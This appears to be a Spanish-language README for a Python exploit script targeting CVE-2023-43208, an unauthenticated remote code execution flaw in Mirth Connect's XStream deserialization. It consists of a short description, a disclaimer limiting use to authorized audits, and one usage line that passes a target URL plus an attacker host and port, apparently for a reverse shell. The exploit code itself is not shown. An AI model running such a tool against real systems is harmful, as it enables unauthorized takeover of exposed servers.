
Explotación en Python de CVE-2023-43208 Mirth Connect RCE (XStream sin autenticación)
Este exploit aprovecha una vulnerabilidad crítica de deserialización dentro del motor XStream de Mirth Connect. Se origina de un parche incompleto para CVE-2023-37679, lo que permite la ejecución arbitraria de código no autenticada en todas las versiones anteriores a la 4.4.1.
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
Este script de exploit está destinado estrictamente a fines educativos y auditorías de seguridad autorizadas para ayudar a los defensores a mitigar CVE-2023-43208; cualquier uso de esta herramienta contra objetivos no autorizados es ilegal y responsabilidad exclusiva del usuario final. El autor proporciona este software "tal cual" sin ninguna garantía, rechaza toda responsabilidad por posible uso indebido o daños, y no aprueba ni fomenta actividades no autorizadas. Úselo bajo su propio riesgo y solo en cumplimiento de las leyes aplicables.